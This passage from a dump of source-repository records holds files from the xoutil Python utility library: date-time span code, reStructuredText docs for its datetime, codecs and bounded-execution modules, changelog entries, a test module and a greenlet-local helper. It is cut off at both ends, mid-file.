\"\"\"\n if isinstance(ts, DateTimeSpan):\n return ts\n else:\n return self(start_datetime=ts.start_date, end_datetime=ts.end_date)\n\n @property\n def past_unbound(self):\n # type: () -> bool\n \"True if the time span is not bound into the past.\"\n return self.start_datetime is None\n\n @property\n def future_unbound(self):\n # type: () -> bool\n \"True if the time span is not bound into the future.\"\n return self.end_datetime is None\n\n @property\n def unbound(self):\n # type: () -> bool\n \"\"\"True if the time span is `unbound into the past <past_unbound>`:attr: or\n `unbount into the future <future_unbound>`:attr: or both.\n\n \"\"\"\n return self.future_unbound or self.past_unbound\n\n @property\n def bound(self):\n # type: () -> bool\n \"True if the time span is not `unbound <unbound>`:attr:.\"\n return not self.unbound\n\n @property\n def valid(self):\n # type: () -> bool\n \"\"\"A bound time span is valid if it starts before it ends.\n\n Unbound time spans are always valid.\n\n \"\"\"\n if self.bound:\n return self.start_datetime <= self.end_datetime\n else:\n return True\n\n def __contains__(self, other):\n # type: (date) -> bool\n \"\"\"Test if datetime `other` is in the datetime span.\n\n If `other` is a `~datetime.date`:class:, we convert it to a naive\n datetime at midnight (00:00:00).\n\n \"\"\"\n if isinstance(other, date):\n if not isinstance(other, datetime):\n other = datetime( # type: ignore\n other.year, other.month, other.day\n )\n if self.start_datetime and self.end_datetime:\n return self.start_datetime <= other <= self.end_datetime\n elif self.start_datetime:\n return self.start_datetime <= other\n elif self.end_datetime:\n return other <= self.end_datetime\n else:\n return True\n else:\n return False\n\n def overlaps(self, other):\n # type: (TimeSpan) -> bool\n \"\"\"Test if the time spans overlaps.\"\"\"\n return bool(self & other)\n\n def isdisjoint(self, other):\n # type: (TimeSpan) -> bool\n return not self.overlaps(other)\n\n def __le__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a superset.\"\n return (self & other) == self\n\n issubset = __le__\n\n def __lt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper superset.\"\n return self != other and self <= other\n\n def __gt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper subset.\"\n return self != other and self >= other\n\n def __ge__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a subset.\"\n # Notice that ge is not the opposite of lt.\n return (self & other) == other\n\n issuperset = covers = __ge__\n\n def __iter__(self) -> Iterator[datetime]: # type: ignore\n yield self.start_datetime\n yield self.end_datetime\n\n def __getitem__(self, index) -> datetime: # type: ignore\n this = tuple(self)\n return this[index]\n\n def __eq__(self, other):\n if isinstance(other, date):\n other = type(self).from_datetime(other)\n elif isinstance(other, TimeSpan) and not isinstance(\n other, DateTimeSpan\n ): # noqa\n other = self.from_timespan(other)\n elif not isinstance(other, DateTimeSpan):\n return NotImplemented\n return (\n self.start_datetime == other.start_datetime\n and self.end_datetime == other.end_datetime\n )\n\n def __hash__(self):\n return hash((DateTimeSpan, self.start_datetime, self.end_datetime))\n\n def __and__(self, other):\n # type: (TimeSpan) -> DateTimeSpan\n \"\"\"Get the date time span that is the intersection with another time span.\n\n If two time spans don't overlap, return the object\n `EmptyTimeSpan`:any:.\n\n If `other` is not a DateTimeSpan we try to create one. If `other` is\n a date/datetime, we create use `from_datetime`:meth:. If `other` is\n TimeSpan we use `from_timespan`:meth:. Other types are passed\n unchanged to the constructor.\n\n \"\"\"\n from xotl.tools.infinity import Infinity\n\n if isinstance(other, _EmptyTimeSpan):\n return other\n elif isinstance(other, date):\n other = DateTimeSpan.from_datetime(other)\n elif isinstance(other, TimeSpan):\n other = DateTimeSpan.from_timespan(other)\n elif not isinstance(other, TimeSpan):\n raise TypeError(\"Invalid type '%s'\" % type(other).__name__)\n start = max(self.start_datetime or -Infinity, other.start_datetime or -Infinity)\n end = min(self.end_datetime or Infinity, other.end_datetime or Infinity)\n if start <= end:\n if start is -Infinity:\n start = None\n if end is Infinity:\n end = None\n return type(self)(start, end)\n else:\n return EmptyTimeSpan\n\n __mul__ = __rmul__ = __rand__ = __and__\n\n def __bool__(self):\n # type: () -> bool\n return True\n\n __nonzero__ = __bool__\n\n def __lshift__(self, delta):\n # type: (Union[int, timedelta]) -> DateTimeSpan\n \"\"\"Return the date time span displaced to the past in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing can cause OverflowError.\n\n \"\"\"\n import numbers\n\n if isinstance(delta, numbers.Integral):\n delta = timedelta(days=delta)\n start = self.start_datetime - delta if self.start_datetime else None\n end = self.end_datetime - delta if self.end_datetime else None\n return type(self)(start, end)\n\n def __rshift__(self, delta):\n # type: (Union[int, timedelta]) -> DateTimeSpan\n \"\"\"Return the date time span displaced to the future in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing can cause OverflowError.\n\n \"\"\"\n return self << -delta\n\n def intersection(self, *others):\n # type: (TimeSpan) -> DateTimeSpan\n \"Return ``self [& other1 & ...]``.\"\n import operator\n from functools import reduce\n\n return reduce(operator.mul, others, self)\n\n def diff(self, other):\n # type: (TimeSpan) -> Tuple[DateTimeSpan, DateTimeSpan]\n \"\"\"Return the two datetime spans which (combined) contain all the\n seconds in `self` which are not in `other`.\n\n Notice this method returns a tuple of exactly two items.\n\n If `other` and `self` don't overlap, return ``(self, EmptyTimeSpan)``.\n\n If ``self <= other`` is True, return the tuple with the empty time\n span in both positions.\n\n Otherwise `self` will have some datetimes which are not in `other`;\n there are possible three cases:\n\n a) other starts before or at self's start datetime; return the empty\n time span and the datetime span from the second after\n `other.end_datetime` up to `self.end_datetime`\n\n b) other ends at or after self's end date; return the datetime span\n from `self.start_datetime` up to the second before\n `other.start_datetime` and the empty time span.\n\n c) `other` is fully contained in `self`; return two non-empty datetime\n spans as in the previous cases.\n\n \"\"\"\n if not self & other:\n return self, EmptyTimeSpan\n other = self & other\n if self == other:\n return EmptyTimeSpan, EmptyTimeSpan\n else:\n assert self > other\n sec = timedelta(seconds=1)\n if self.start_datetime == other.start_datetime:\n return (\n EmptyTimeSpan,\n DateTimeSpan(other.end_datetime + sec, self.end_datetime),\n )\n elif self.end_datetime == other.end_datetime:\n return (\n DateTimeSpan(self.start_datetime, other.start_datetime - sec),\n EmptyTimeSpan,\n )\n else:\n return (\n DateTimeSpan(self.start_datetime, other.start_datetime - sec),\n DateTimeSpan(other.end_datetime + sec, self.end_datetime),\n )\n\n def __repr__(self):\n start, end = self\n return \"DateTimeSpan(%r, %r)\" % (\n start.isoformat().replace(\"T\", \" \") if start else None,\n end.isoformat().replace(\"T\", \" \") if end else None,\n )\n\n __str__ = __repr__\n\n\ndel IntEnum\n" }, { "alpha_fraction": 0.6356736421585083, "alphanum_fraction": 0.6432637572288513, "avg_line_length": 28.27777862548828, "blob_id": "5f4a5f2dfc2bb2ca1166308e101e227de015dc4a", "content_id": "0158edd2b5a629946c8a65e3502a07f25d4d7226", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 527, "license_type": "permissive", "max_line_length": 77, "num_lines": 18, "path": "/docs/source/xotl.tools/future/codecs.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.codecs`:mod: - Codec registry, base classes and tools\n========================================================================\n\n.. module:: xotl.tools.future.codecs\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: force_encoding\n\n.. autofunction:: safe_decode\n\n.. autofunction:: safe_encode\n" }, { "alpha_fraction": 0.6255130767822266, "alphanum_fraction": 0.6289864182472229, "avg_line_length": 21.949275970458984, "blob_id": "1b678a1b5c12d393f5c01378854dc889dacd5d1c", "content_id": "3b33cd97b777f6115fae2357def804a457711227", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3168, "license_type": "permissive", "max_line_length": 77, "num_lines": 138, "path": "/docs/source/xotl.tools/future/datetime.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.datetime`:mod: - Basic date and time types\n=============================================================\n\n.. module:: xotl.tools.future.datetime\n\nThis module extends the standard library's `datetime`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nIn Pytnon versions <= 3 date format fails for several dates, for example\n``date(1800, 1, 1).strftime(\"%Y\")``. So, classes `~datetime.date`:class: and\n`~datetime.datetime`:class: are redefined if that case.\n\nThis problem could be solved by redefining the `strftime` function in the\n`time` module, because it is used for all `strftime` methods; but (WTF),\nPython double checks the year (in each method and then again in\n`time.strftime` function).\n\n.. autofunction:: assure\n\nWe added the following features.\n\n.. autofunction:: strfdelta\n.. autofunction:: strftime\n.. autofunction:: get_month_first\n.. autofunction:: get_month_last\n.. autofunction:: get_next_month\n.. autofunction:: is_full_month\n\n.. autoclass:: flextime\n\n.. autofunction:: daterange([start,] stop[, step])\n\n.. autoclass:: DateField\n\n.. autoclass:: TimeSpan\n\n .. automethod:: from_date\n\n .. autoattribute:: past_unbound\n .. autoattribute:: future_unbound\n .. autoattribute:: unbound\n .. autoattribute:: bound\n .. autoattribute:: valid\n\n .. automethod:: __le__\n .. method:: issubset\n\n An alias for `__le__`:meth:.\n\n .. automethod:: __ge__\n .. method:: issuperset\n\n An alias for `__ge__`:meth:.\n\n .. method:: covers\n\n An alias for `__ge__`:meth:.\n\n .. automethod:: isdisjoint\n .. automethod:: overlaps\n\n .. automethod:: __contains__\n\n .. automethod:: __and__\n .. method:: __mul__\n\n An alias for `__and__`:meth:.\n\n .. automethod:: intersection\n\n .. automethod:: __lshift__\n\n .. automethod:: __rshift__\n\n .. automethod:: __len__\n\n .. automethod:: diff\n\n\n.. autoclass:: DateTimeSpan\n\n .. automethod:: from_datetime\n .. automethod:: from_timespan\n\n .. autoattribute:: past_unbound\n .. autoattribute:: future_unbound\n .. autoattribute:: unbound\n .. autoattribute:: bound\n .. autoattribute:: valid\n\n .. automethod:: __le__\n .. method:: issubset\n\n An alias for `__le__`:meth:.\n\n .. automethod:: __ge__\n .. method:: issuperset\n\n An alias for `__ge__`:meth:.\n\n .. method:: covers\n\n An alias for `__ge__`:meth:.\n\n .. automethod:: isdisjoint\n .. automethod:: overlaps\n\n .. automethod:: __contains__\n\n .. automethod:: __and__\n .. method:: __mul__\n\n An alias for `__and__`:meth:.\n\n .. automethod:: intersection\n\n .. automethod:: __lshift__\n\n .. automethod:: __rshift__\n\n .. automethod:: __len__\n\n .. automethod:: diff\n\n\n.. data:: EmptyTimeSpan\n\n The empty time span. It's not an instance of `TimeSpan`:class: but engage\n set-like operations: union, intersection, etc.\n\n No date is a member of the empty time span. The empty time span is a\n proper subset of any time span. It's only a superset of itself. It's not\n a proper superset of any other time span nor itself.\n\n This instance is a singleton.\n" }, { "alpha_fraction": 0.7089315056800842, "alphanum_fraction": 0.7105647921562195, "avg_line_length": 35.1273307800293, "blob_id": "ad9376f16fc9e7953a494ecc082b4e4a572b2079", "content_id": "55dc43544281e802dca68608653848a85d614620", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 11633, "license_type": "permissive", "max_line_length": 78, "num_lines": 322, "path": "/docs/source/xotl.tools/bound.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=========================================================================\n `xotl.tools.bound`:mod: -- Helpers for bounded execution of co-routines\n=========================================================================\n\n.. module:: xotl.tools.bound\n\n.. versionadded:: 1.6.3\n\n\n\nA bounded execution model\n=========================\n\nSome features are easy to implement using a generator or co-routine\n(`342`:pep:). For instance, you might want to \"report units of work\" one at a\ntime. These kind of features could be easily programmed without any `bounds`\nwhatsoever, and then you might \"weave\" the bounds.\n\nThis module helps to separate the work-doing function from the boundary-tests\ndefinitions.\n\nThis document uses the following terminology:\n\n.. glossary::\n\n unbounded function\n\n This is the function that does the actual work without testing for any\n `boundary condition`:term:. Boundary conditions are not \"natural\n causes\" of termination for the algorithm but conditions imposed\n elsewhere: the environment, resource management, etc.\n\n This function *must* return a generator, called the `unbounded\n generator`:term:.\n\n unbounded generator\n\n The generator returned by an `unbounded function`:term:. This generator\n is allowed to yield forever, although it could terminate by itself. So\n this is actually a `possibly` unbounded generator, but we keep the term\n to emphasize.\n\n boundary condition\n\n It's a condition that does not belong to the logical description of any\n algorithm. When this condition is met it indicates that the `unbounded\n generator`:term: should be closed. The boundary condition is tested\n each time the unbounded generator yields.\n\n A boundary condition is usually implemented in a single function called\n the `boundary definition`:term:.\n\n boundary definition\n\n A function that implements a boundary condition. This function must\n comply with the boundary protocol (see `boundary`:func:).\n\n Sometimes we identify the boundary condition with its `boundary\n definition`.\n\n bounded function\n\n It's the result of applying a `boundary definition` to an `unbounded\n function`.\n\n bounded generator\n\n It's the result of applying a `boundary condition` to an `unbounded\n generator`.\n\n\nThe bounded execution model takes at least an `unbounded generator` and a\n`boundary condition`. Applying the boundary condition to the unbounded\ngenerator ultimately results in a `bounded generator`, which will behave\nalmost equivalently to the `unbounded generator` but will stop when the\nboundary condition yields True or when the unbounded generator itself is\nexhausted.\n\n\nIncluded boundary conditions\n============================\n\n.. autofunction:: timed(maxtime)\n\n.. autofunction:: times(n)\n\n.. autofunction:: accumulated(mass, *attrs, initial=0)\n\n.. autofunction:: pred(func, skipargs=True)\n\n.. autofunction:: until_errors(*errors)\n\n.. autofunction:: until(time=None, times=None, errors=None)\n\n\nChaining several boundary conditions\n====================================\n\nTo created a more complex boundary than the one provided by a single condition\nyou could use the following high-level boundaries:\n\n.. autofunction:: whenany(*boundaries)\n\n.. autofunction:: whenall(*boundaries)\n\n\nDefining boundaries\n===================\n\nIf none of the boundaries defined deals with a boundary condition you have,\nyou may create another one using `boundary`:func:. This is usually employed\nas decorator on the `boundary definition`:term:.\n\n.. autofunction:: boundary(definition)\n\n\nIllustration of a boundary\n--------------------------\n\nLet's explain in detail the implementation of `times`:func: as an example of\nhow a boundary condition could be implemented.\n\n\n.. code-block:: python\n :linenos:\n\n @boundary\n def times(n):\n '''Becomes True after the `nth` item have been produced.'''\n passed = 0\n yield False\n while passed < n:\n\t yield False\n\t passed += 1\n yield True\n\nWe implemented the boundary condition via the `boundary`:func: helper. This\nhelpers allows to implement the boundary condition via a boundary definition\n(the function above). The ``boundary`` helper takes the definition and builds\na `BoundaryCondition`:class: instance. This instance can then be used to\ndecorate the `unbounded function`, returning a `bounded function` (a\n`Bounded`:class: instance).\n\nWhen the `bounded function` is called, what actually happens is that:\n\n- First the boundary condition is invoked passing the ``n`` argument, and thus\n we obtain the generator from the ``times`` function.\n\n- We also get the generator from the unbounded function.\n\n- Then we call ``next(boundary)`` to allow the ``times`` boundary to\n initialize itself. This runs the code of the ``times`` definition up to the\n line 5 (the first ``yield`` statement).\n\n- The `bounded function` ignores the message from the boundary at this point.\n\n- Then it sends the arguments passed to original function via the ``send()``\n method of the boundary condition generator.\n\n- This unfreezes the boundary condition that now tests whether ``passes`` is\n less that ``n``. If this is true, the boundary yields False and suspends\n there at line 7.\n\n- The `bounded function` see that message is not True and asks the `unbounded\n generator` for its next value.\n\n- Then it sends that value to the boundary condition generator, which resumes\n execution at line 8. The value sent is ignored and ``passes`` gets\n incremented by 1.\n\n- Again the generator asks if ``passes`` is less that ``n``. If passes has\n reached ``n``, it will execute line 9, yielding True.\n\n- The `bounded function` see that the boundary condition is True and calls the\n ``close()`` method to the boundary condition generator.\n\n- This is like raising a GeneratorExit just after resuming the ``times`` below\n line 9. The error is not trapped and propagates the ``close()`` method of\n the generator knows this means the generator has properly finished.\n\n .. note:: Other boundaries might need to deal with GeneratorExit explicitly.\n\n- Then the `bounded function` regains control and calls the ``close()`` method\n of the `unbounded generator`, this effectively raises a GeneratorExit inside\n the unbounded generator, which if untreated means everything went well.\n\n\nIf you look at the implementation of the `included boundary conditions`_,\nyou'll see that all have the same pattern:\n\na) Initialization code, followed by a ``yield False`` statement. This is a\n clear indicator that the included boundary conditions disregard the first\n message (the arguments to the unbounded function).\n\nb) A looping structure that tests the condition has not been met and yields\n False at each cycle.\n\nc) The ``yield True`` statement outside the loop to indicate the boundary\n condition has been met.\n\nThis pattern is not an accident. Exceptionally `whenall`:func: and\n`whenany`:func: lack the first standalone `yield False` because they must not\nassume all its subordinate predicates will ignore the first message.\n\n\nInternal API\n============\n\n.. autoclass:: Bounded\n :members: __call__, generate\n\n This class is actually subclassed inside the\n `~BoundaryCondition.apply`:meth: so that the weaving boundary definition\n with the `target` unbounded function is not exposed.\n\n.. autoclass:: BoundaryCondition\n :members:\n\n.. _celery: http://docs.celeryproject.org/\n\n\nAn example: time bounded batch processing\n=========================================\n\nWe have a project in which we need to send emails inside a `cron` task\n(celery_ is not available). Emails to be sent are placed inside an `Outbox`\nbut we may only spent about 60 seconds to send as many emails as we can. If\nour emails are reasonably small (i.e will be delivered to the SMTP server in a\nfew miliseconds) we could use the `timed`:func: predicate to bound the\nexecution of the task::\n\n @timed(50)\n def send_emails():\n outbox = Outbox.open()\n try:\n for message in outbox:\n emailbackend.send(message)\n outbox.remove(message)\n yield message\n except GeneratorExit:\n # This means the time we were given is off.\n pass\n finally:\n outbox.close() # commit the changes to the outbox\n\nNotice that you **must** enclose your batch-processing code in a ``try``\nstatement if you need to somehow commit changes. Since we may call the\n``close()`` method of the generator to signal that it must stop.\n\nA ``finally`` clause is not always appropriated cause an error that is not\nGeneratorExit error should not commit the data unless you're sure data changes\nthat were made before the error could be produced. In the code above the only\nplace in the code above where an error could happen is the sending of the\nemail, and the data is only touched for each email that is actually sent. So\nwe can safely close our outbox and commit the removal of previous message from\nthe outbox.\n\n\nUsing the `Bounded.generate`:meth: method\n=========================================\n\nCalling a `bounded generator` simply returns the last valued produced by the\n`unbounded generator`, but sometimes you need to actually *see* all the values\nproduced. This is useful if you need to meld several `generators` with\npartially overlapping boundary conditions.\n\nLet's give an example by extending a bit the example given in the previous\nsection. Assume you now need to extend your cron task to also read an Inbox\nas much as it can and then send as many messages as it can. Both things\nshould be done under a given amount of time, however the accumulated size of\nsent messages should not surpass a threshold of bytes to avoid congestion.\n\nFor this task you may use both `timed`:func: and `accumulated`:func:. But you\nmust apply `accumulated`:func: only to the process of sending the messages and\nthe `timed` boundary to the overall process.\n\nThis can be accomplished like this:\n\n.. code-block:: python\n :linenos:\n\n def communicate(interval, bandwidth):\n from itertools import chain as meld\n\n def receive():\n for message in Inbox.receive():\n yield message\n\n @accumulated(bandwith, 'size')\n def send():\n for message in Outbox.messages():\n yield message\n\n @timed(interval)\n def execute():\n for _ in meld(receive(), send.generate()):\n yield\n return execute()\n\n\nLet's break this into its parts:\n\n- The ``receive`` function reads the Inbox and yields each message received.\n\n It is actually an `unbounded function`:term: but we don't want to bound its\n execution in isolation.\n\n- The ``send`` unbounded function sends every message we have in the Outbox\n and yields each one. In this case we *can* apply the `accumulated` boundary\n to get a `Bounded`:class: instance.\n\n- Then we define an `execute` function bounded by `timed`. This function\n melds the ``receive`` and ``send`` processes, but we can't actually call\n ``send`` because we need to yield after each message has been received or\n sent. That's why we need to call the `~Bounded.generate`:meth: so that the\n time boundary is also applied to the sending process.\n\n.. note:: The structure from this example is actually taken from a real\n program, although simplified to serve better for learning. For instance,\n in our real-world program `bandwidth` could be None to indicate no size\n limit should be applied to the sending process. Also in the example we're\n not actually saving nor sending messages!\n" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 62, "blob_id": "0e6d6c5dc9fd52cf81dc0422b17c038e8b9eac72", "content_id": "a18127e04e95c50eb24221e591f1dca904cbd18c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 63, "license_type": "permissive", "max_line_length": 62, "num_lines": 1, "path": "/docs/source/history/_changes-1.6.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the pre-release version of `xoutil.bound`:mod: module.\n" }, { "alpha_fraction": 0.6820276379585266, "alphanum_fraction": 0.7188940048217773, "avg_line_length": 42.400001525878906, "blob_id": "33cabd414b437a564db1c6db0283cc020b07e79d", "content_id": "a5d58ed827e1c67dc4aac697273602f7795bc3d7", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 217, "license_type": "permissive", "max_line_length": 78, "num_lines": 5, "path": "/docs/source/history/_changes-2.0.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.8 <rel-1.9.8>`:ref:\\\n\n- Fix bug__ when comparing version numbers (`xoutil.versions`:mod:).\n\n __ https://gitlab.merchise.org/merchise/xoutil/merge_requests/12\n" }, { "alpha_fraction": 0.7409326434135437, "alphanum_fraction": 0.7409326434135437, "avg_line_length": 37.599998474121094, "blob_id": "f86f456cd25e5644ee2cb3dbaf2efce1c7db91e7", "content_id": "c8cc2cd317c6fff551d0f28c2e81f4347c4af1e9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 193, "license_type": "permissive", "max_line_length": 70, "num_lines": 5, "path": "/docs/source/history/_changes-1.6.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the `yield` parameter in `xoutil.fs.ensure_filename`:func:.\n\n- Added the `base` parameter in `xoutil.modules.moduleproperty`:func:.\n\n- Added the function `xoutil.fs.concatfiles`:func:.\n" }, { "alpha_fraction": 0.6364414095878601, "alphanum_fraction": 0.6381522417068481, "avg_line_length": 15.942028999328613, "blob_id": "3bfa9158030c37635dffb5238af974a9742fa557", "content_id": "75c1bb244455de15769fa517725fbadd10fb6a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": "/tests/customizetestbed.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom xoutil.modules import moduleproperty\nfrom xoutil.objects import memoized_property\n\n\n@moduleproperty\ndef this(self):\n return self\n\n\n@moduleproperty\ndef store(self):\n return getattr(self, \"_store\", None)\n\n\[email protected]\ndef store(self, value):\n setattr(self, \"_store\", value)\n\n\[email protected]\ndef store(self):\n delattr(self, \"_store\")\n\n\ndef prop(self):\n return getattr(self, \"_prop\", None)\n\n\ndef _prop_set(self, val):\n setattr(self, \"_prop\", val)\n\n\ndef _prop_del(self):\n delattr(self, \"_prop\")\n\n\nprop = moduleproperty(prop, _prop_set, _prop_del)\n\n\ndef otherfunction():\n return 1\n\n\ndef memoized(self):\n return self\n\n\nmemoized = moduleproperty(memoized, base=memoized_property)\n\ntry:\n\n @memoized.setter\n def memoized(self, value):\n pass\n\n\nexcept AttributeError:\n pass # Ok\nelse:\n raise AssertionError(\"module-level memoized_property should be read-only\")\n" }, { "alpha_fraction": 0.5593580603599548, "alphanum_fraction": 0.5595514178276062, "avg_line_length": 33.71141052246094, "blob_id": "7419492e9d7efe1086486bdc2766b79e62025938", "content_id": "96c9b1ba69ba903fe964308e674ddf4507d9ad61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5173, "license_type": "no_license", "max_line_length": 79, "num_lines": 149, "path": "/xotl/tools/tasking/_greenlet_local.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n# This module is a modified copy of gevent.local. We simply modify it to\n# allow absence of greenlets, and fallback to thread isolation in this case.\n#\n# This decouples xotl.tools.context from gevent and allows to use the\n# greenlets if available.\n\n# WARNING: We removed the greenlet protection gevent.local does while\n# initializing a subclass of `local`. Instead we simply provide protection at\n# the thread level, so sub-classes of `local` MUST NOT switch greenlets.\nfrom threading import RLock\n\n\n# since each thread has its own greenlet we can just use those as identifiers\n# for the context. If greenlets are not available we fall back to the\n# current thread ident depending on where it is.\ntry:\n from greenlet import getcurrent\nexcept ImportError:\n from threading import current_thread as getcurrent\n\n\nfrom weakref import WeakKeyDictionary\nfrom copy import copy\n\n\nimport sys\n\nPYPY = hasattr(sys, \"pypy_version_info\")\n\n__all__ = [\"local\"]\n\n\nclass _localbase:\n __slots__ = \"_local__args\", \"_local__lock\", \"_local__dicts\"\n\n def __new__(cls, *args, **kw):\n self = object.__new__(cls)\n object.__setattr__(self, \"_local__args\", (args, kw))\n object.__setattr__(self, \"_local__lock\", RLock())\n dicts = WeakKeyDictionary()\n object.__setattr__(self, \"_local__dicts\", dicts)\n\n if args or kw:\n clsi, obji = cls.__init__, object.__init__\n if (PYPY and clsi == obji) or (not PYPY and clsi is obji):\n raise TypeError(\"Initialization arguments are not supported\")\n\n # We need to create the greenlet dict in anticipation of\n # __init__ being called, to make sure we don't call it again ourselves.\n dict = object.__getattribute__(self, \"__dict__\")\n dicts[getcurrent()] = dict\n return self\n\n\ndef _init_locals(self):\n d = {}\n dicts = object.__getattribute__(self, \"_local__dicts\")\n dicts[getcurrent()] = d\n object.__setattr__(self, \"__dict__\", d)\n\n # we have a new instance dict, so call out __init__ if we have one\n cls = type(self)\n if cls.__init__ is not object.__init__:\n args, kw = object.__getattribute__(self, \"_local__args\")\n cls.__init__(self, *args, **kw)\n\n\nclass local(_localbase):\n \"\"\"Greenlet-local data.\"\"\"\n\n def __getattribute__(self, name):\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n # it's OK to acquire the lock here and not earlier, because the\n # above code won't switch out however, subclassed __init__ might\n # switch, so we do need to acquire the lock here\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__getattribute__(self, name)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__getattribute__(self, name)\n\n def __setattr__(self, name, value):\n if name == \"__dict__\":\n clsname = self.__class__.__name__\n raise AttributeError(\n \"%r object attribute '__dict__' is read-only\" % clsname\n )\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__setattr__(self, name, value)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__setattr__(self, name, value)\n\n def __delattr__(self, name):\n if name == \"__dict__\":\n clsname = self.__class__.__name__\n raise AttributeError(\n \"%r object attribute '__dict__' is read-only\" % clsname\n )\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__delattr__(self, name)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__delattr__(self, name)\n\n def __copy__(self):\n currentId = getcurrent()\n d = object.__getattribute__(self, \"_local__dicts\").get(currentId)\n duplicate = copy(d)\n\n cls = type(self)\n if cls.__init__ is not object.__init__:\n args, kw = object.__getattribute__(self, \"_local__args\")\n instance = cls(*args, **kw)\n else:\n instance = cls()\n\n object.__setattr__(instance, \"_local__dicts\", {currentId: duplicate})\n\n return instance\n" }, { "alpha_fraction": 0.3368421196937561, "alphanum_fraction": 0.3368421196937561, "avg_line_length": 18, "blob_id": "17cdb4fa0779999af5064dfc8d2525a02fa16d9d", "content_id": "83effcf0aa2a9b4517934f222d57737f2718237f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 95, "license_type": "permissive", "max_line_length": 23, "num_lines": 5, "path": "/docs/source/xoutil.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=======================\n Package `xoutil`:mod:\n=======================\n\n.. automodule:: xoutil\n" }, { "alpha_fraction": 0.6344647407531738, "alphanum_fraction": 0.6344647407531738, "avg_line_length": 46.875, "blob_id": "c75bd43e543ced7f9992e4fc25e530df7d425608", "content_id": "d65eb345b1e868e46674495e4696492d54efdd1a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 383, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/docs/source/xotl.tools/crypto.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.crypto`:mod: - Other cryptographic services\n=======================================================\n\n.. automodule:: xotl.tools.crypto\n :members: generate_password, PASS_PHRASE_LEVEL_BASIC,\n\t PASS_PHRASE_LEVEL_MAPPED, PASS_PHRASE_LEVEL_MAPPED_MIXED,\n\t PASS_PHRASE_LEVEL_MAPPED_DATED, PASS_PHRASE_LEVEL_STRICT,\n\t DEFAULT_PASS_PHRASE_LEVEL, 